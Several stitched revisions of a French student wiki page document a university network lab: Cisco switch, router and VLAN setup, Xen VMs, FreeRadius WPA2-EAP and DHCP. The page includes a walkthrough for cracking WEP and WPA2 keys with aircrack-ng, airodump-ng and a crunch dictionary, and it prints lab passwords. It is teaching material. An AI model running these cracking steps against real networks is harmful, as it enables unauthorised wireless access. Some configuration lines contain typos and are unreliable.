
airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP système & reseau IMA2a5 2019/2020

2019-11-28T16:37:11Z

Jcabrald : /* Configuration des ports du commutateur = */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP sysres IMA2a5 2019/2020 G6

2019-11-28T12:06:15Z

Jcabrald : /* Mise en place serveur DHCPi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server que par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // groupe6 remplacé par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo /* CETTE COMMANDE EST À FAIRE POUR TOUT LES SSID */

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun"
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles. /* CES COMMANDES SONT À FAIRE POUR CHAQUE SSID */

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise ne place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCPi===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

TP sysres IMA2a5 2019/2020 G6

2019-11-28T11:26:43Z

Jcabrald : /* Mise en place serveur DHCPi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
